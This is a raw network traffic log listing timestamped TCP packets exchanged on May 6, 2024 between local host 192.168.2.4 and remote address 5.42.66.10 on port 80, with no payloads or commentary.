May 6, 2024 07:53:04.790061951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790086031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790097952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790118933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790132046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790277004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790288925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790297985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790311098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790317059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790323019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790333986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790338993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790347099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790359974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790364027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790371895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790383101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790389061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790395021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790395975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790405989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790410042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790416956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790421963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790427923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790440083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790451050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790462971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790465117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790474892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790477037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790488005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790498972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790503025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790510893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790519953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790523052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790534973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790543079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790548086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790560007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790568113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790590048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790601969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790613890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790623903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790637016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790638924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790663004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790687084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790782928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790795088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790805101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790817022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790819883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790827036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790833950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790838957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790851116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790851116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790863037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790873051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790874958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790885925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790887117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790896893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790908098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790911913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790920973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790932894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790937901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790945053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790945053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790956020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790967941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790973902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.790980101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790992022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.790998936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791012049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791040897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791115999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791126966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791137934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791150093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791152000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791162968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791162968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791176081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791183949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791188002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791198969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791212082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791212082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791224003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791228056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791245937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791260958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791260958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791269064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791280985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791290998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791292906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791302919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791305065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791317940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791325092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791328907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791333914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791341066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791343927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791352987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791366100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791377068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791378975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791385889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791388988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791399956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791412115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791414022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791433096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791451931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791562080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791574001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791600943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791613102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791743994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791754961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791764975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791778088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791781902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791790009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791795969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791801929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791812897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791814089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791826010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791837931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791838884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791846991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791886091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791913986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791925907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791938066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791950941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791950941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791961908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791974068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791975975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.791987896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.791997910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792016029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792035103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792052031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792062998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792073011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792083979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792089939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792095900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792112112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792117119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792117119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792124033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792135000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792141914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792145967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792157888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792165995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792169094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792180061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792187929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792191982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792203903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792206049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792213917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792215109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792227030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792237997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792251110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792251110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792259932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792260885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792273045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792280912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792284966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792294025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792298079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792308092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792319059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792341948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792347908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792360067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792371035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792383909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792413950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792532921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792545080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792567015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792592049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792706966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792717934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792728901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792740107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792746067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792752028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792768002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792805910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792829037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792840004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792850971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792861938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792865992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792874098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792886972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792887926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792898893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792911053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792912006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792922020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792924881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792944908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792959929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792965889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.792970896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792982101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792993069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.792994022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793004036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793005943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793015957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793023109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793030024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793051958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793095112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793107986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793118000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793129921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793133974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793142080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793154001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793157101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793165922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793178082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793184996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793190002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793190956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793203115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793215990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793220043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793230057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793241978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793241978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793253899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793253899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793267012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793279886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793281078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793292999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793303967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793309927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793314934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793317080 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793327093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793344021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793368101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793394089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793406963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793416977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793431997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793432951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793443918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793454885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793456078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793467045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793478966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793483973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793489933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793498993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793500900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793510914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793520927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793524981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793535948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793548107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793550968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793557882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793560982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793571949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793580055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793584108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793593884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793605089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793607950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793617010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793620110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793629885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793642044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793642998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793673038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793730974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793744087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793756008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793767929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793770075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793778896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793790102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793792963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793802977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793816090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793817043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793827057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793831110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793838978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793850899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793853998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793863058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793874025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793878078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793884993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793885946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793898106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793910027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793915033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793922901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793934107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793939114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793945074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793951988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793957949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793967962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793971062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.793981075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793992043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.793996096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794013977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794018030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794027090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794032097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794038057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794049978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794055939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794061899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794073105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794076920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.794084072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794095039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.794100046 CEST	49741	80	192.168.2.4	5.42.66.10
